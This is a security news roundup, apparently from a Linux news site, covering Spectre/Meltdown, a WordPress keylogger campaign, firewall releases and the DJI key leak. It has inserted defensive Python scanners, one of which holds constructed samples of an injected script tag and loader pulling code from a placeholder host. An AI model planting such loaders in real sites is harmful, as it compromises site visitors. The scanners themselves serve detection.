Security: Updates, Intel, Taxes, Voting and WordPress

Filed under
Security
  • Security updates for Tuesday
  • House chair hits reports of Intel notifying Chinese firms about chip vulnerabilities before US

    Walden's remarks come after the Journal reported that Intel had notified a small group of companies — including Chinese firms — about Spectre and Meltdown vulnerabilities which, if exploited, allow hackers to access sensitive information stored on computers, phones and servers using Intel, AMD and ARM chips.

  • File Your Taxes Before Scammers Do It For You

    Today, Jan. 29, is officially the first day of the 2018 tax-filing season, also known as the day fraudsters start requesting phony tax refunds in the names of identity theft victims. Want to minimize the chances of getting hit by tax refund fraud this year? File your taxes before the bad guys can!

  • Voting-machine makers are already worried about Defcon

    What's worse, he added that "nearly every state is using some machines that are no longer manufactured, and many election officials struggle to find replacement parts." Before millions of electronic votes were cast for the next US president, Norden told press that "everything from software support, replacement parts and screen calibration were at risk."

    So it's no wonder voting machine makers are keen to get their gear off eBay and keep it out of the hands of white-hat hackers equally keen to expose their collective security failings.

  • More than 2,000 WordPress websites are infected with a keylogger

    The keylogger is part of a malicious package that also installs an in-browser cryptocurrency miner that's surreptitiously run on the computers of people visiting the infected sites. Data provided here, here, and here by website search service PublicWWW showed that, as of Monday afternoon, the package was running on 2,092 sites.
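Injections of this kind are usually a script tag, or a small loader that sets `.src`, appended to a theme or plugin file and pointing at a host the site never intended to load from. The following is an added example, not code from the article or from PublicWWW: it walks a WordPress tree, extracts every script source host from PHP, JS and HTML files, and reports those outside an allowlist. The allowlist, the two sample files and the `cdn-stats.example` host are constructed placeholders, not identifiers from the incident.

```python
"""Report externally loaded script hosts in a WordPress install.

Added example; not from the article or PublicWWW. Looks for two injection
shapes: an HTML <script src=...> tag (typically echoed from a theme's
functions.php) and a JS loader that assigns element.src. Every host found
is compared with an allowlist of origins the site intentionally uses.
"""
import re
from pathlib import Path
from urllib.parse import urlparse

# <script ... src="..."> with either quote style; [^>]* also spans newlines.
SCRIPT_SRC = re.compile(r"""<script[^>]*\ssrc\s*=\s*["']([^"']+)["']""", re.I)
# JS loader: something.src = "https://host/..." or "//host/..."
JS_SRC = re.compile(r"""\.src\s*=\s*["'](https?:)?//([^/"']+)[^"']*["']""", re.I)
# Hosts this site is expected to load scripts from (assumption, per site).
ALLOWED_HOSTS = {"www.example.com", "cdnjs.cloudflare.com", "fonts.googleapis.com"}
SCAN_SUFFIXES = {".php", ".js", ".html"}


def script_hosts(text: str) -> set:
    """All hosts referenced by script tags or JS loaders in `text`.

    Relative sources such as /wp-includes/js/jquery.js have no host and
    are ignored; protocol-relative //host/path is normalised to https.
    """
    hosts = set()
    for m in SCRIPT_SRC.finditer(text):
        src = m.group(1).strip()
        if src.startswith("//"):
            src = "https:" + src
        host = urlparse(src).hostname
        if host:
            hosts.add(host.lower())
    for m in JS_SRC.finditer(text):
        hosts.add(m.group(2).lower())
    return hosts


def suspicious_hosts(text: str, allowed=ALLOWED_HOSTS) -> list:
    """Hosts in `text` that are not on the allowlist, sorted."""
    return sorted(h for h in script_hosts(text) if h not in allowed)


def scan_tree(root, allowed=ALLOWED_HOSTS) -> dict:
    """{file_path: [bad hosts]} for every PHP/JS/HTML file under `root`."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            bad = suspicious_hosts(path.read_text(errors="replace"), allowed)
            if bad:
                findings[str(path)] = bad
    return findings


# Constructed sample of a theme functions.php with one injected tag.
SAMPLE_FUNCTIONS_PHP = """<?php
// constructed sample; cdn-stats.example is a placeholder host
function theme_footer_scripts() {
    echo '<script src="https://www.example.com/wp-content/themes/t/app.js"></script>';
    echo '<script type="text/javascript" src="//cdn-stats.example/lib/socket.js"></script>';
}
add_action('wp_footer', 'theme_footer_scripts');
"""

# Constructed sample of a loader appended to a theme .js file.
SAMPLE_JS = """// constructed sample loader; cdn-stats.example is a placeholder host
var s = document.createElement('script');
s.src = 'https://cdn-stats.example/m.js?v=1';
document.head.appendChild(s);
"""

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path, hosts in scan_tree(sys.argv[1]).items():
            print(f"{path}: {', '.join(hosts)}")
    else:
        print("functions.php:", suspicious_hosts(SAMPLE_FUNCTIONS_PHP))
        print("loader.js:    ", suspicious_hosts(SAMPLE_JS))
```

Run it against `wp-content/` on a suspect site; anything it lists that is not a known CDN deserves a look at the file and at the `wp_options` table, since the same tag is often stored in the database rather than on disk.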

Security: Intel, Lenovo, and Windows

Filed under
Security

OPNsense 18.1

Filed under
Security
BSD
  • OPNsense 18.1 released

    For more than 3 years now, OPNsense has been driving innovation through modularising and hardening the open source firewall, with simple and reliable firmware upgrades, multi-language support, HardenedBSD security, fast adoption of upstream software updates as well as clear and stable 2-Clause BSD licensing.

    We humbly present to you the sum of another major iteration of the OPNsense firewall. Over the second half of 2017 well over 500 changes have made it into this release, nicknamed "Groovy Gecko". Most notably, the firewall NAT rules have been reworked to be more flexible and usable via plugins, which is going to pave the way for subsequent API works on the core firewall functionality. For more details please find the attached list of changes below.

  • OPNsense 18.1 BSD Firewall/Network OS Released

    After hitting the RC phase a few weeks ago, OPNsense 18.1 has been officially released as the latest version of this pfSense-forked network/router-oriented BSD operating system.

    OPNsense 18.1 is based on FreeBSD 11.1 while pulling in the HardenedBSD security changes. OPNsense 18.1 reworks its firewall NAT rules, PHP 7.1 and jQuery 3 are powering the web interface, there is now OpenVPN multi-remote support for clients, IPv6 shared forwarding support, improvements for intrusion detection alerts, a rewritten firewall live log, reverse DNS support for insight reporting, and a variety of new plugins.

Security: Voting Safety, Intel, Windows and Linux

Filed under
Security

Security: Intel Scandals, Microsoft Patches Cause Data Loss/Corruption

Filed under
Security

Parrot 3.11 release notes

Filed under
GNU
Linux
Security

Parrot 3.11 is now available for download.

This new release introduces many improvements and security fixes compared to the previous versions. It includes by default all the spectre/meltdown security patches currently available and an updated version of the Linux 4.14 kernel.

A new car hacking menu now contains a collection of useful open source tools in the automotive industry to test real world cars or simulate CANBus networks.

Metasploit and postgresql are now patched to work flawlessly out of the box in live mode.

Other important updates include Firefox 58, increased installer stability, many updated security tools and some important graphic improvements.

Parrot Studio was reintroduced with many improvements. This special derivative of Parrot is designed for multimedia production as an improved version of Parrot Home for workstations, with many useful productivity tools pre-installed.

This release will probably be the last version of the 3.x series (except for possible security updates), and we wanted to include some of the changes that we planned for Parrot 4.x as a gift for our community.


Security: PLC, Blacksmith, Windows at NHS

Filed under
Security

  • Vulnerable industrial controls directly connected to Internet? Why not?

    As Beaumont said, "It's an open own goal." And this particular advisory doesn't stop with the PLCs. Some PLC manufacturers haven't even responded to inquiries from the DHS' National Cybersecurity and Communications Integration Center (NCCIC) about recently-discovered vulnerabilities, such as one in the Nari PCS-9611 Feeder Relay, a control system used to manage some electrical grids. The vulnerability, reported by two Kaspersky Labs researchers, "could allow a remote attacker arbitrary read/write abilities on the system."

  • Free Linux Tool Monitors Systems for Meltdown Attacks

    SentinelOne this week released Blacksmith, a free Linux tool that can detect Meltdown vulnerability exploitation attempts, so system administrators can stop attacks before they take root.

    The company has been working on a similar tool to detect Spectre vulnerability attacks.

  • Welsh NHS systems back up after computer 'chaos'

    The National Cyber Security Centre said the problems were caused by technical issues and were not the result of a cyber attack.

Security: Updates, US Senate, Malware on Social Control Media, Ubuntu 16.04.4 LTS Delay

Filed under
Security
  • Security updates for Friday
  • Senate IT Tells Staffers They're On Their Own When It Comes To Personal Devices And State-Sponsored Hackers

    Notification of state-sponsored hacking attempts has revealed another weak spot in the US government's defenses. The security of the government's systems is an ongoing concern, but the Senate has revealed it's not doing much to ensure sensitive documents and communications don't end up in the hands of foreign hackers.

    The news of the hacking attempt was greeted with assurances that nothing of value was taken.

  • Beware! Undetectable CrossRAT malware targets Windows, MacOS, and Linux systems

    According to researchers, the Dark Caracal hackers do not rely on any "zero-day exploits" to distribute their malware; instead, they use basic social engineering via posts on Facebook groups and WhatsApp messages, encouraging users to visit hacker-controlled fake websites and download malicious applications.

  • Ubuntu 16.04.4 LTS Delayed Due To Spectre & Meltdown

    Ubuntu 16.04.4 LTS had been scheduled to ship mid-February as the latest point release for this Long Term Support release, but unfortunately that is not going to happen as planned due to the Canonical kernel developers being overloaded by Spectre and Meltdown mitigation work.

    Ubuntu 16.04.4 is now being delayed by an unknown length of time, but they believe it shouldn't be more than "a few weeks" past the original 15 February ship date. They are waiting for the Spectre/Meltdown mitigation work to settle so that the patches shipped in this point release are properly qualified. Additionally, they have been so busy with that mitigation work that they have neglected other kernel patches that may also need to make it into this point release.
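Whether a given machine actually carries the Spectre/Meltdown mitigations that the Parrot 3.11 and Ubuntu 16.04.4 items above are about is something the kernel reports itself. The following is an added example, not code from Canonical or from Parrot: it reads the sysfs vulnerability files and exits non-zero when any issue is still unmitigated. It assumes the files `/sys/devices/system/cpu/vulnerabilities/{meltdown,spectre_v1,spectre_v2}`, which kernels carrying the mitigation work expose, and their `Not affected` / `Vulnerable` / `Mitigation: ...` wording; the directory is a parameter so the parser can be exercised against a constructed copy.

```python
"""Classify CPU side-channel mitigation status from the kernel's sysfs files.

Added example, not from Canonical or Parrot. Assumes
/sys/devices/system/cpu/vulnerabilities/{meltdown,spectre_v1,spectre_v2}
exist on a kernel with the mitigation work, each holding one line that
starts with "Not affected", "Vulnerable" or "Mitigation: <name>".
A missing file (older kernel) is reported as unknown, never as safe.
"""
import sys
from pathlib import Path

SYSFS_DIR = Path("/sys/devices/system/cpu/vulnerabilities")
# Names match the sysfs file names.
ISSUES = ("meltdown", "spectre_v1", "spectre_v2")


def classify(text: str) -> str:
    """Map one sysfs value to not_affected / mitigated / vulnerable / unknown."""
    value = text.strip()
    if value.startswith("Not affected"):
        return "not_affected"
    if value.startswith("Mitigation:"):
        return "mitigated"
    if value.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"


def read_status(sysfs_dir=SYSFS_DIR) -> dict:
    """Return {issue: (state, raw_text)} for each issue in ISSUES."""
    sysfs_dir = Path(sysfs_dir)
    status = {}
    for issue in ISSUES:
        try:
            raw = (sysfs_dir / issue).read_text()
        except OSError:
            # File absent: kernel predates the interface or lacks the backport.
            status[issue] = ("unknown", "")
            continue
        status[issue] = (classify(raw), raw.strip())
    return status


def unmitigated(status: dict) -> list:
    """Issues still needing attention: anything not mitigated or not affected."""
    return sorted(i for i, (state, _) in status.items()
                  if state in ("vulnerable", "unknown"))


if __name__ == "__main__":
    st = read_status(sys.argv[1] if len(sys.argv) > 1 else SYSFS_DIR)
    for issue, (state, raw) in st.items():
        print(f"{issue:10s} {state:13s} {raw}")
    sys.exit(1 if unmitigated(st) else 0)
```

Note that "Mitigation:" only says the kernel side is in place; for Spectre v2 the microcode half (the reboot-prone updates mentioned in the Intel item further down) is a separate question, and the raw text after the colon is where the kernel spells out which variant it is using.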

Security: 'DevOps', Linux-based SkySecure, VirusTotal, DJI

Filed under
Security
  • DevOps and Security: How to Overcome Cultural Challenges and Transform to True DevSecOps

    Similar to the proliferation of mobile devices in the enterprise several years ago where organizations were feeling the pressure to have a mobile strategy but didn’t know where to start, we’re seeing the same situation with development methodologies. To accelerate development velocity, teams are feeling the pressure to “do DevOps,” and when integrating security, to “do DevSecOps.” But much like during the initial mobile wave, many companies say they’re implementing these methodologies, and might even think they are, but in reality, they’re not. Yet.

  • What does DevOps do in 2018?

    In 2018, we’re expecting DevOps to become the new norm for larger enterprise teams. This is because we’re likely to see developers on older, higher value systems implementing a more DevOps centric approach, having seen it work on projects that have traditionally been highly visible, but low value.

  • Cisco Acquires Skyport as Cyber-Security Investments Continue

    January 2018 has emerged to become a banner month for cyber-security acquisitions, with at least 10 acquisitions announced so far, four of which were announced between Jan. 22 and 25. Cisco continued the trend on Jan. 24 by announcing its intention to acquire privately-held server security startup Skyport.

    Financial terms of Cisco's Skyport acquisition are not being publicly disclosed. A Cisco spokesperson told eWEEK that the deal is expected to close in Cisco's 2018 fiscal third quarter. However, a Cisco spokesperson said the company doesn't plan to continue marketing the existing Skyport System server security products.

    [...]

    It's the Linux-based SkySecure Server platform tied into the SkySecure Center service that further validates the integrity of firmware, BIOS, software and cryptography.

  • S for Security is Google owner Alphabet's new favorite letter

    The business will be the new home of VirusTotal, which Google acquired in 2012. Chronicle’s other story will be “a new cybersecurity intelligence and analytics platform that we hope can help enterprises better manage and understand their own security-related data.”

  • Github shrugs off drone maker DJI's crypto key DMCA takedown effort

    Github rejected a DMCA takedown request from Chinese drone-maker DJI after someone forked source code left in the open by a naughty DJI developer, The Register can reveal.

    This included AES keys permitting decryption of flight control firmware, which could allow drone fliers with technical skills to remove geofencing from the flight control software: this software prevents DJI drones from flying in certain areas such as the approach paths for airports, or near government buildings deemed to be sensitive.

    Though the released key is not for the latest firmware version, The Register has seen evidence (detailed below) that drone hackers are already incorporating it in modified firmware available for anyone to download and flash to their drones.

    DJI declined to comment for this article. Github ignored The Register's invitation to comment.

    [...]

    The code was forked by drone researcher Kevin Finisterre, who submitted a successful rebuttal to the takedown request on the grounds that Github's terms and conditions explicitly permit forking of public repos.

    "DJI mistakenly marked code repositories as public subsequently granting license for anyone to fork said repos. This accident can be evidenced by their press release," wrote Finisterre, linking to a DJI statement.
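The DJI incident above is a supply-chain lesson as much as a licensing one: key material committed to a repository that is later made public cannot be recalled, whatever the takedown notice says. The following is an added example, not DJI's or GitHub's code, of the kind of pre-push check that would have caught it: a heuristic scanner that flags hex strings of AES key length and high-entropy values assigned to key-like identifiers. The sample source and the values in it are constructed filler, not any real key; the identifier list and entropy threshold are assumptions to tune per code base.

```python
"""Heuristic scan for hard-coded key material before code is committed.

Added example; not DJI's or GitHub's code. Flags (1) hex runs of exactly
32 or 64 characters, the AES-128/AES-256 key sizes, and (2) assignments to
key-like names whose value has high Shannon entropy. The sample source at
the bottom is constructed; its key and token values are random filler.
"""
import math
import re
import sys
from collections import Counter
from pathlib import Path

# Hex run of AES key length, not embedded in a longer hex string.
HEX_KEY = re.compile(
    r"(?<![0-9A-Fa-f])([0-9A-Fa-f]{32}|[0-9A-Fa-f]{64})(?![0-9A-Fa-f])"
)
# name containing a key-like word, then = or :, then a 16+ char token.
# Identifier list is an assumption; extend it for the code base at hand.
KEY_ASSIGN = re.compile(
    r"\b\w*(aes|key|secret|token|passw)\w*\s*[:=]\s*[\"']?([A-Za-z0-9+/=_\-]{16,})",
    re.IGNORECASE,
)
# Bits per character above which a token is treated as random. 4.5 is the
# common base64 threshold (assumption); plain identifiers sit well below it.
ENTROPY_THRESHOLD = 4.5


def shannon_entropy(s: str) -> float:
    """Shannon entropy of `s` in bits per character."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_text(text: str) -> list:
    """Return [(line_no, kind, token)] for suspicious tokens in `text`."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        seen = set()
        for m in HEX_KEY.finditer(line):
            seen.add(m.group(1))
            findings.append((lineno, "hex_key", m.group(1)))
        for m in KEY_ASSIGN.finditer(line):
            token = m.group(2)
            if token in seen or HEX_KEY.fullmatch(token):
                continue  # already reported as a hex key
            if shannon_entropy(token) >= ENTROPY_THRESHOLD:
                findings.append((lineno, "high_entropy", token))
    return findings


def scan_file(path) -> list:
    """scan_text over one file; undecodable bytes are replaced, not fatal."""
    return scan_text(Path(path).read_text(errors="replace"))


# Constructed sample source; the key and token values are random filler.
SAMPLE_SOURCE = """\
// constructed sample, not real firmware source
#define FW_VERSION "01.04.0100"
static const char *aes_key = "0f1e2d3c4b5a69788796a5b4c3d2e1f0";  /* AES-128 */
static const char *key_name = "flight_controller_key";
api_token = "AbC9xZ2kQ8pLm4Vt7RwS1uY6nD0eH3jF"
debug_level = 3
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = [(p, f) for p in sys.argv[1:] for f in scan_file(p)]
    else:
        results = [("<sample>", f) for f in scan_text(SAMPLE_SOURCE)]
    for path, (lineno, kind, token) in results:
        print(f"{path}:{lineno}: {kind}: {token[:8]}...")
    sys.exit(1 if results else 0)
```

Wired into a pre-commit hook over the staged files, a non-zero exit blocks the commit. Expect false positives on hashes and test vectors, which is why it reports rather than rewrites; the low-entropy `key_name` line in the sample shows the entropy gate doing its job.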

Security: Updates, Attacking Network Protocols, Hide 'N Seek, FBI, Intel, WhatsApp

Filed under
Security
  • Security updates for Thursday
  • Attacking Network Protocols

    Most of us in the Free and Open Source software world know about Wireshark and using it to capture network traffic information. This book mentions that tool, but focuses on using a different tool that was written by the author, called CANAPE.Core. Along the way, the author calls out multiple other resources for further study. I like and appreciate that very much! This is a complex topic and even a detailed and technically complex book like this one cannot possibly cover every aspect of the topic in 300 pages. What is covered is clearly expressed, technically deep, and valuable.

  • What is Hide 'N Seek? New IoT botnet uses peer-to-peer communication to infect over 20,000 devices

    "The HNS botnet communicates in a complex and decentralized manner and uses multiple anti-tampering techniques to prevent a third party from hijacking/poisoning it," Bitdefender researchers wrote in a blog post published on Wednesday (24 January). "The bot can perform web exploitation against a series of devices via the same exploit as Reaper (CVE-2016-10401 and other vulnerabilities against networking equipment)."

  • Senator Demands FBI Director Explain His Encryption Backdoor Bullshit

    "I would like to learn more about how you arrived at and justify this ill-informed policy proposal. Please provide me with a list of the cryptographers with whom you’ve personally discussed this topic since our July 2017 meeting and specifically identify those experts who advised you that companies can feasibly design government access features into their products without weakening cybersecurity. Please provide this information by February 23, 2018."

  • Intel's plan to fix Meltdown in silicon raises more questions than answers

    Why this matters: Intel has been busy working with PC makers and OS vendors like Microsoft to release microcode that includes so-called mitigations, microcode updates that patch the vulnerabilities. But even that hasn’t gone so well: Intel advised end users to stop applying patches after systems unexpectedly rebooted. Now, Intel has revealed it’s working on a more permanent fix, but the impact on users remains unknown.

  • WhatsApp Vulnerability